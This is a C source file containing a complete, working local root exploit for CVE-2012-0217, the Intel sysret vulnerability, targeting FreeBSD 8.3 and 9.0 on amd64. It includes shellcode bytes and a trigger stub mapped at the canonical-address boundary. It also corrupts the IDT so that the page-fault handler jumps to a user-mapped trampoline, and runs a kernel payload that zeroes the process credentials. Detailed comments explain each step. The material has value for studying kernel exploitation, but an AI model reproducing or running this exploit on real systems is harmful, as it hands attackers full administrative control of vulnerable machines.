// CVE-2012-0217 Intel sysret exploit -- iZsh (izsh at fail0verflow.com)
// Copyright 2012 all right reserved, not for commercial uses, bitches
// Infringement Punishment: Monkeys coming out of your ass Bruce Almighty style.
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <unistd.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/utsname.h>
#include <machine/cpufunc.h>
#define _WANT_UCRED
#include <sys/proc.h>
#include <machine/segments.h>
#include <sys/param.h>
#include <sys/linker.h>

// Kernel addresses of the exception handlers, filled in by main() through
// get_symaddr(). kernelmodepayload() passes them to setidt() to rewrite the
// IDT entries, and trigger() uses the low 32 bits of Xpage_ptr to place the
// trampoline.
uintptr_t Xofl_ptr, Xbnd_ptr, Xill_ptr, Xdna_ptr, Xpage_ptr, Xfpu_ptr, Xalign_ptr, Xmchk_ptr, Xxmm_ptr;

struct gate_descriptor * sidt()
{
    struct region_descriptor idt;

    asm ("sidt %0": "=m"(idt));

    return (struct gate_descriptor*)idt.rd_base;
}

u_long get_symaddr(char *symname)
{
    struct kld_sym_lookup ksym;

    ksym.version = sizeof (ksym);
    ksym.symname = symname;

    if (kldsym(0, KLDSYM_LOOKUP, &ksym) < 0) {
        perror("kldsym");
        exit(1);
    }
    printf("    [+] Resolved %s to %#lx\n", ksym.symname, ksym.symvalue);
    return ksym.symvalue;
}

// Code taken from amd64/amd64/machdep.c
//
// Fill in entry `idx` of the descriptor table `idt` so that it refers to the
// handler at address `func`.
//
//   idt  - base of the gate descriptor table to modify
//   idx  - index of the entry to write
//   func - handler address, split across gd_looffset and gd_hioffset
//   typ  - value stored in gd_type
//   dpl  - value stored in gd_dpl
//   ist  - value stored in gd_ist
//
// The selector is always the kernel code selector and the entry is always
// marked present (gd_p = 1).
void setidt(struct gate_descriptor *idt, int idx, uintptr_t func, int typ, int dpl, int ist)
{
    struct gate_descriptor *ip;

    ip = idt + idx;
    // Low part of the address; presumably truncated to the bit-field width
    // (Target Offset[15:0]) -- confirm against struct gate_descriptor.
    ip->gd_looffset = func;
    ip->gd_selector = GSEL(GCODE_SEL, SEL_KPL);
    ip->gd_ist = ist;
    ip->gd_xx = 0;
    ip->gd_type = typ;
    ip->gd_dpl = dpl;
    ip->gd_p = 1;
    // Remaining address bits, from bit 16 upwards.
    ip->gd_hioffset = func>>16;
}

// User-mode landing point: kernelmodepayload() loads this function's address
// into rcx before executing sysretq.
// The credentials of the process were already rewritten there, so nothing
// needs to be spawned here: report success and terminate with status 0.
void shellcode()
{
    fputs("[*] Got root!\n", stdout);
    exit(EXIT_SUCCESS);
}

// Payload jumped to by the trampoline that trigger() installs.
// In order, it:
//   1. rewrites the IDT entries disturbed by the exploit, using the handler
//      addresses resolved in main();
//   2. reads the current thread pointer from gs:0 and sets cr_uid, cr_ruid,
//      cr_rgid and cr_groups[0] of its process credentials to 0;
//   3. executes swapgs + sysretq with rcx = shellcode to go back to user mode.
// It is never called as an ordinary C function and does not return.
void kernelmodepayload()
{
    struct thread *td;
    struct ucred *cred;

    // We need to restore/recover whatever we smashed
    // We initialized rsp to idt[14] + 10*8, i.e. idt[19] (see trigger())
    // The #GP exception frame writes 6*64bit registers, i.e. it overwrites
    // idt[18], idt[17] and idt[16]
    // thus overall we have:
    // - idt[18], idt[17] and idt[16] are trashed
    // - tf_addr -> overwrites the 64bit-LSB of idt[15]
    // - tf_trapno -> overwrites Target Offset[63:32] of idt[14]
    // - rdi -> overwrites the 64bit-LSB of idt[7]
    // - #PF exception frame overwrites idt[6], idt[5] and idt[4]
    struct gate_descriptor *idt = sidt();
    setidt(idt, IDT_OF, Xofl_ptr, SDT_SYSIGT, SEL_KPL, 0); // 4
    setidt(idt, IDT_BR, Xbnd_ptr, SDT_SYSIGT, SEL_KPL, 0); // 5
    setidt(idt, IDT_UD, Xill_ptr, SDT_SYSIGT, SEL_KPL, 0); // 6
    setidt(idt, IDT_NM, Xdna_ptr, SDT_SYSIGT, SEL_KPL, 0); // 7
    setidt(idt, IDT_PF, Xpage_ptr, SDT_SYSIGT, SEL_KPL, 0); // 14
    setidt(idt, IDT_MF, Xfpu_ptr, SDT_SYSIGT, SEL_KPL, 0); // 15
    setidt(idt, IDT_AC, Xalign_ptr, SDT_SYSIGT, SEL_KPL, 0); // 16
    setidt(idt, IDT_MC, Xmchk_ptr, SDT_SYSIGT, SEL_KPL, 0); // 17
    setidt(idt, IDT_XF, Xxmm_ptr, SDT_SYSIGT, SEL_KPL, 0); // 18

    // get the thread pointer
    asm ("mov %%gs:0, %0" : "=r"(td));

    // The Dark Knight Rises
    // Zero the effective uid, real uid, real gid and first group of the
    // credential structure attached to the current process.
    cred = td->td_proc->p_ucred;
    cred->cr_uid = cred->cr_ruid = cred->cr_rgid = 0;
    cred->cr_groups[0] = 0;

    // return to user mode to spawn the shell
    // (shellcode() itself only prints a message and exits)
    asm ("swapgs; sysretq;" :: "c"(shellcode)); // store the shellcode addr to rcx
}

// Byte lengths of the machine-code strings `triggercode` and `trampolinecode`
// defined in trigger(), not counting the terminating NUL of the literals.
#define TRIGGERCODESIZE 20
#define TRAMPOLINECODESIZE 18

// Build the two user-space code stubs and run the first one.
//
//   1. Maps the last page below 1<<47 and copies `triggercode` so that it
//      ends exactly at the end of that page.
//   2. Patches the stub's `mov rsp, imm64` operand with an address derived
//      from the IDT base returned by sidt().
//   3. Maps memory at 0x9_0000_0000 | low32(Xpage_ptr), copies
//      `trampolinecode` there and patches its `mov rax, imm64` operand with
//      the address of kernelmodepayload().
//   4. Calls the trigger stub.
//
// Exits with status 1 if either mmap() fails. Requires Xpage_ptr to have been
// resolved beforehand (done in main()).
void trigger()
{
    printf("[*] Setup...\n");
    // Allocate one page just before the non-canonical address
    printf("    [+] Trigger code...\n");
    uint64_t pagesize = getpagesize();
    uint8_t * area = (uint8_t*)((1ULL << 47) - pagesize);
    area = mmap(area, pagesize,
        PROT_READ | PROT_WRITE | PROT_EXEC,
        MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0);
    if (area == MAP_FAILED) {
        perror("mmap (trigger)");
        exit(1);
    }

    // Copy the trigger code at the end of the page
    // such that the syscall instruction is at its
    // boundary
    char triggercode[] =
        "\xb8\x18\x00\x00\x00" // mov rax, 24; #getuid
        "\x48\x89\xe3" // mov rbx, rsp; save the user's stack for later
        "\x48\xbc\xbe\xba\xfe\xca\xde\xc0\xad\xde" // mov rsp, 0xdeadc0decafebabe
        "\x0f\x05"; // syscall

    uint8_t * trigger_addr = area + pagesize - TRIGGERCODESIZE;
    memcpy(trigger_addr, triggercode, TRIGGERCODESIZE);

    // There are two outcomes given a target rsp:
    // - if rsp can't be written to, a double fault is triggered
    //   (Xdblfault defined in sys/amd64/amd64/exception.S)
    //   and the exception frame is pushed to a special stack
    // - otherwise a #GP is triggered
    //   (Xprot defined in sys/amd64/amd64/exception.S)
    //   and the exception frame is pushed to [rsp]
    //
    // In the latter case, trouble is... #GP triggers a page fault
    // (Xpage):
    //  IDTVEC(prot)
    //      subq    $TF_ERR,%rsp
    //  [1] movl    $T_PROTFLT,TF_TRAPNO(%rsp)
    //  [2] movq    $0,TF_ADDR(%rsp)
    //  [3] movq    %rdi,TF_RDI(%rsp)   /* free up a GP register */
    //      leaq    doreti_iret(%rip),%rdi
    //      cmpq    %rdi,TF_RIP(%rsp)
    //      je  1f          /* kernel but with user gsbase!! */
    //  [4] testb   $SEL_RPL_MASK,TF_CS(%rsp) /* Did we come from kernel? */
    //      jz  2f          /* already running with kernel GS.base */
    //  1:  swapgs
    //  2:  movq    PCPU(CURPCB),%rdi [5]
    //
    // [4] sets the Z flag because we come from the kernel (while executing sysret)
    // and we therefore skip swapgs. But GS is in fact the user GS.base! Indeed
    // it was restored just before calling sysret...
    // Thus, [5] triggers a pagefault while trying to access gs:data
    // If we don't do anything we'll eventually doublefault, triplefault etc. and crash
    //
    // We therefore need a way: (1) to recover from the GP, (2) to clean
    // any mess we did. Both could be solved if we can get an arbitrary
    // code execution by the time we reach [5] (NB: this is not mandatory, we could
    // get the code execution later down the fault trigger chain)
    //
    // So... here is the idea: wouldn't it be nice if we could overwrite the
    // page fault handler's address and therefore get code execution when [5]
    // triggers the #PF?
    //
    // For reference:
    // Gate descriptor:
    // +0: Target Offset[15:0] | Target Selector
    // +4: Some stuff | Target Offset[31:16]
    // +8: Target Offset[63:32]
    // +12: Stuff
    //
    // and from include/frame.h:
    //  struct trapframe {
    //      register_t  tf_rdi;
    //      register_t  tf_rsi;
    //      register_t  tf_rdx;
    //      register_t  tf_rcx;
    //      register_t  tf_r8;
    //      register_t  tf_r9;
    //      register_t  tf_rax;
    //      register_t  tf_rbx;
    //      register_t  tf_rbp;
    //      register_t  tf_r10;
    //      register_t  tf_r11;
    //      register_t  tf_r12;
    //      register_t  tf_r13;
    //      register_t  tf_r14;
    //      register_t  tf_r15;
    //      uint32_t    tf_trapno;
    //      uint16_t    tf_fs;
    //      uint16_t    tf_gs;
    //      register_t  tf_addr;
    //      uint32_t    tf_flags;
    //      uint16_t    tf_es;
    //      uint16_t    tf_ds;
    //      /* below portion defined in hardware */
    //      register_t  tf_err;
    //      register_t  tf_rip;
    //      register_t  tf_cs;
    //      register_t  tf_rflags;
    //      register_t  tf_rsp;
    //      register_t  tf_ss;
    //  };
    //
    // When the exception is triggered, the hardware pushes
    // ss, rsp, rflags, cs, rip and err
    //
    // We can see that [1], [2] and [3] write to the stack
    // [3] is fully user-controlled through rdi, so we could try to align
    // rsp such that [3] overwrites the offset address
    //
    // The trouble is... rsp is 16byte aligned for exceptions. We can
    // therefore only overwrite the first 32-LSB of the offset address
    // (check how rdi is 16byte aligned in this trapframe)
    //
    // [2] writes 0 to tf_addr which is also 16byte aligned. So no dice.
    // That leaves us with [1] which writes T_PROTFLT (0x9) to tf_trapno
    // and tf_trapno is 16byte aligned + 8!
    // This enables us to set Target Offset[63:32] to 0x9
    //
    // We set rsp to &idt[14] + 10 * 8 (to align tf_trapno with Offset[63:32])
    // trigger_addr + 10 is the imm64 operand of `mov rsp, imm64` in
    // triggercode: 5 + 3 bytes of preceding instructions + 2 opcode bytes.
    *(uint64_t*)(trigger_addr + 10) = (uint64_t)(((uint8_t*)&sidt()[14]) + 10 * 8);
    // Hence, the #PF handler's address is now 0x9WWXXYYZZ
    // Furthermore, WWXXYYZZ is known since we can get (see get_symaddr()) the #PF's address
    // Thus, the idea is to setup a trampoline code at 0x9WWXXYYZZ which does
    // some setup and jump to our kernel mode code
    printf("    [+] Trampoline code...\n");
    char trampolinecode[] =
        "\x0f\x01\xf8" // swapgs; switch back to the kernel's GS.base
        "\x48\x89\xdc" // mov rsp, rbx; restore rsp, it's enough to use the user's stack
        "\x48\xb8\xbe\xba\xfe\xca\xde\xc0\xad\xde" // mov rax, 0xdeadc0decafebabe
        "\xff\xe0"; // jmp rax

    uint8_t * trampoline = (uint8_t*)(0x900000000 | (Xpage_ptr & 0xFFFFFFFF));
    size_t trampoline_allocsize = pagesize;
    // We round the address to the PAGESIZE for the allocation
    // Not enough space for the trampoline code ?
    // (i.e. the stub would run past the end of its first page: map a second one)
    if ((uint8_t*)((uint64_t)trampoline & ~(pagesize-1)) + pagesize < trampoline + TRAMPOLINECODESIZE)
        trampoline_allocsize += pagesize;
    if (mmap((void*)((uint64_t)trampoline & ~(pagesize-1)), trampoline_allocsize,
        PROT_READ | PROT_WRITE | PROT_EXEC,
        MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0) == MAP_FAILED)
    {
        perror("mmap (trampoline)");
        exit(1);
    }
    memcpy(trampoline, trampolinecode, TRAMPOLINECODESIZE);
    // trampoline + 8 is the imm64 operand of `mov rax, imm64` in
    // trampolinecode: 3 + 3 bytes of preceding instructions + 2 opcode bytes.
    *(uint64_t*)(trampoline + 8) = (uint64_t)kernelmodepayload;
    // Call it
    printf("[*] Fire in the hole!\n");
    ((void (*)())trigger_addr)();
}

// One (sysname, release, machine) combination this program accepts. The
// fields point at string literals, so they are const-qualified.
typedef struct validtarget
{
    const char * sysname;
    const char * release;
    const char * machine;
} validtarget_t;

// Check a host description against the built-in list of accepted targets.
//
//   sysname, release, machine - NUL-terminated strings, typically the
//                               corresponding fields of struct utsname
//
// Returns 1 when all three strings exactly (case-sensitively) match one
// table entry, 0 otherwise. The arguments are only read, never modified.
int validate_target(const char * sysname, const char * release, const char * machine)
{
    // Built once instead of on every call; the length is derived from the
    // array itself, so no null sentinel entry is needed.
    static const validtarget_t targets[] = {
        { "FreeBSD", "8.3-RELEASE", "amd64" },
        { "FreeBSD", "9.0-RELEASE", "amd64" },
    };
    const size_t ntargets = sizeof targets / sizeof targets[0];

    for (size_t i = 0; i < ntargets; ++i) {
        if (strcmp(targets[i].sysname, sysname) == 0
            && strcmp(targets[i].release, release) == 0
            && strcmp(targets[i].machine, machine) == 0) {
            return 1;
        }
    }
    return 0;
}

// Write the CPUID leaf-0 vendor identification string into `cpu_vendor`.
//
//   cpu_vendor - destination buffer; must have room for at least 13 bytes
//                (three register-sized words plus the terminating NUL)
//
// The words are stored in the order regs[1], regs[3], regs[2]; presumably
// that is EBX, EDX, ECX as filled in by do_cpuid() -- confirm against
// <machine/cpufunc.h>.
void get_cpu_vendor(char * cpu_vendor)
{
    u_int regs[4];

    do_cpuid(0, regs);
    // Copy with memcpy rather than storing through a (u_int *) cast of the
    // char buffer: the cast form violates the effective-type (strict
    // aliasing) rule and assumes an alignment the caller does not guarantee.
    memcpy(cpu_vendor + 0 * sizeof regs[0], &regs[1], sizeof regs[1]);
    memcpy(cpu_vendor + 1 * sizeof regs[0], &regs[3], sizeof regs[3]);
    memcpy(cpu_vendor + 2 * sizeof regs[0], &regs[2], sizeof regs[2]);
    cpu_vendor[12] = '\0';
}

// Return 1 when the vendor string produced by get_cpu_vendor() is exactly
// "GenuineIntel", and 0 for any other vendor.
int is_intel()
{
    char vendor[13];

    get_cpu_vendor(vendor);
    if (strcmp(vendor, "GenuineIntel") == 0)
        return 1;
    return 0;
}

// Program entry point.
//
// Prints the host's CPU vendor and uname() fields, then exits with status 1
// unless the CPU vendor is "GenuineIntel" and the OS triple is accepted by
// validate_target(). Otherwise it resolves the kernel handler addresses into
// the X*_ptr globals and calls trigger().
//
// Command-line arguments are not used.
int main(int argc, char *argv[])
{
    (void)argc;
    (void)argv;

    printf("CVE-2012-0217 Intel sysret exploit -- iZsh (izsh at fail0verflow.com)\n\n");

    printf("[*] Retrieving host information...\n");
    char cpu_vendor[13];
    get_cpu_vendor(cpu_vendor);
    struct utsname ver;
    // uname() can fail; without this check the fields printed and compared
    // below would be read uninitialised.
    if (uname(&ver) < 0) {
        perror("uname");
        exit(1);
    }
    printf("    [+] CPU: %s\n", cpu_vendor);
    printf("    [+] sysname: %s\n", ver.sysname);
    printf("    [+] release: %s\n", ver.release);
    printf("    [+] version: %s\n", ver.version);
    printf("    [+] machine: %s\n", ver.machine);
    printf("[*] Validating target OS and version...\n");
    if (!is_intel() || !validate_target(ver.sysname, ver.release, ver.machine)) {
        printf("    [+] NOT Vulnerable :-(\n");
        exit(1);
    }
    printf("    [+] Vulnerable :-)\n");
    // Prepare the values we'll need to restore the kernel to a stable state
    printf("[*] Resolving kernel addresses...\n");
    Xofl_ptr = (uintptr_t)get_symaddr("Xofl");
    Xbnd_ptr = (uintptr_t)get_symaddr("Xbnd");
    Xill_ptr = (uintptr_t)get_symaddr("Xill");
    Xdna_ptr = (uintptr_t)get_symaddr("Xdna");
    Xpage_ptr = (uintptr_t)get_symaddr("Xpage");
    Xfpu_ptr = (uintptr_t)get_symaddr("Xfpu");
    Xalign_ptr = (uintptr_t)get_symaddr("Xalign");
    Xmchk_ptr = (uintptr_t)get_symaddr("Xmchk");
    Xxmm_ptr = (uintptr_t)get_symaddr("Xxmm");
    // doeet!
    trigger();
    return 0;
}